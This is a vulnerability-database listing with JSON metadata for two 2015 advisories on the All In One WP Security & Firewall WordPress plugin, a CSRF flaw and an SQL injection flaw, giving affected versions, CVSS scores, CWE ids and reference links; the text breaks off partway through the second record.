Search

Find a vulnerability

Search criteria

    15 vulnerabilities found for All In One WP Security & Firewall by Tips and Tricks HQ

    VAR-201503-0452

    Vulnerability from variot - Updated: 2025-04-13 23:39

    Cross-site request forgery (CSRF) vulnerability in the All In One WP Security & Firewall plugin before 3.9.0 for WordPress allows remote attackers to hijack the authentication of administrators for requests that delete logs of 404 (aka Not Found) HTTP status codes. All In One WP Security & Firewall is WordPress plugin that provides security functionality. If a user views a malicious page while logged in, access logs (404 events) maintained by the product may be deleted. An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks. WordPress is a set of blogging platform developed by WordPress Software Foundation using PHP language, which supports setting up personal blogging websites on PHP and MySQL servers

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201503-0452",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wordpress security and firewall",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "tips and tricks hq",
            "version": "3.8.9"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "v3.8.9"
          },
          {
            "model": "all in one wordpress security and firewall",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "tips and tricks hq",
            "version": "3.8.9"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.9"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.3"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.2"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.9.0"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "74387"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "JPCERT",
        "sources": [
          {
            "db": "BID",
            "id": "74387"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2015-0895",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2015-0895",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "High",
                "accessVector": "Network",
                "authentication": "None",
                "author": "IPA",
                "availabilityImpact": "None",
                "baseScore": 2.6,
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "JVNDB-2015-000038",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Low",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "VHN-78841",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-0895",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "IPA",
                "id": "JVNDB-2015-000038",
                "trust": 0.8,
                "value": "Low"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201503-127",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-78841",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cross-site request forgery (CSRF) vulnerability in the All In One WP Security \u0026 Firewall plugin before 3.9.0 for WordPress allows remote attackers to hijack the authentication of administrators for requests that delete logs of 404 (aka Not Found) HTTP status codes. All In One WP Security \u0026 Firewall is WordPress plugin that provides security functionality. If a user views a malicious page while logged in, access logs (404 events) maintained by the product may be deleted. \nAn attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks. WordPress is a set of blogging platform developed by WordPress Software Foundation using PHP language, which supports setting up personal blogging websites on PHP and MySQL servers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "BID",
            "id": "74387"
          },
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          }
        ],
        "trust": 1.98
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-0895",
            "trust": 2.8
          },
          {
            "db": "JVN",
            "id": "JVN87204433",
            "trust": 2.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038",
            "trust": 2.5
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "74387",
            "trust": 0.4
          },
          {
            "db": "VULHUB",
            "id": "VHN-78841",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "db": "BID",
            "id": "74387"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "id": "VAR-201503-0452",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-13T23:39:07.061000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall - Changelog",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-352",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "http://jvn.jp/en/jp/jvn87204433/index.html"
          },
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/"
          },
          {
            "trust": 1.7,
            "url": "http://jvndb.jvn.jp/jvndb/jvndb-2015-000038"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0895"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0895"
          },
          {
            "trust": 0.3,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall all in one wp security \u0026 firewall"
          },
          {
            "trust": 0.3,
            "url": "http://wordpress.org/"
          },
          {
            "trust": 0.3,
            "url": "jvn.jp/en/jp/jvn87204433/index.html  "
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "db": "BID",
            "id": "74387"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "db": "BID",
            "id": "74387"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-03-07T00:00:00",
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "date": "2015-03-06T00:00:00",
            "db": "BID",
            "id": "74387"
          },
          {
            "date": "2015-03-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "date": "2015-03-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "date": "2015-03-07T02:59:02.723000",
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-03-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "date": "2015-03-06T00:00:00",
            "db": "BID",
            "id": "74387"
          },
          {
            "date": "2015-03-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "date": "2015-03-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "All In One WP Security \u0026 Firewall vulnerable to cross-site request forgery",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "cross-site request forgery",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201503-0451

    Vulnerability from variot - Updated: 2025-04-13 23:26

    SQL injection vulnerability in the All In One WP Security & Firewall plugin before 3.8.8 for WordPress allows remote attackers to execute arbitrary SQL commands via unspecified vectors. All In One WP Security & Firewall is WordPress plugin that provides security functionality. ooooooo_q reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.If an administrator views a malicious page while logged in, an arbitrary SQL command may be executed. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. WordPress is a set of blogging platform developed by WordPress Software Foundation using PHP language, which supports setting up personal blogging websites on PHP and MySQL servers

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201503-0451",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wordpress security and firewall",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "tips and tricks hq",
            "version": "3.8.7"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "v3.8.7"
          },
          {
            "model": "all in one wordpress security and firewall",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "tips and tricks hq",
            "version": "3.8.7"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.7"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.6"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.5"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.4"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.3"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.2"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.1"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.8"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "74856"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ooooooo_q",
        "sources": [
          {
            "db": "BID",
            "id": "74856"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2015-0894",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.8,
                "id": "CVE-2015-0894",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "High",
                "accessVector": "Network",
                "authentication": "None",
                "author": "IPA",
                "availabilityImpact": "Partial",
                "baseScore": 5.1,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2015-000037",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.8,
                "id": "VHN-78840",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-0894",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "IPA",
                "id": "JVNDB-2015-000037",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201503-126",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-78840",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection vulnerability in the All In One WP Security \u0026 Firewall plugin before 3.8.8 for WordPress allows remote attackers to execute arbitrary SQL commands via unspecified vectors. All In One WP Security \u0026 Firewall is WordPress plugin that provides security functionality. ooooooo_q reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.If an administrator views a malicious page while logged in, an arbitrary SQL command may be executed. \nExploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. WordPress is a set of blogging platform developed by WordPress Software Foundation using PHP language, which supports setting up personal blogging websites on PHP and MySQL servers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "BID",
            "id": "74856"
          },
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          }
        ],
        "trust": 1.98
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-0894",
            "trust": 2.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037",
            "trust": 2.8
          },
          {
            "db": "JVN",
            "id": "JVN30832515",
            "trust": 2.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "74856",
            "trust": 0.4
          },
          {
            "db": "VULHUB",
            "id": "VHN-78840",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "db": "BID",
            "id": "74856"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "id": "VAR-201503-0451",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-13T23:26:46.018000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall - Changelog",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.8,
            "url": "http://jvn.jp/en/jp/jvn30832515/index.html"
          },
          {
            "trust": 2.0,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/"
          },
          {
            "trust": 1.7,
            "url": "http://jvndb.jvn.jp/jvndb/jvndb-2015-000037"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0894"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0894"
          },
          {
            "trust": 0.3,
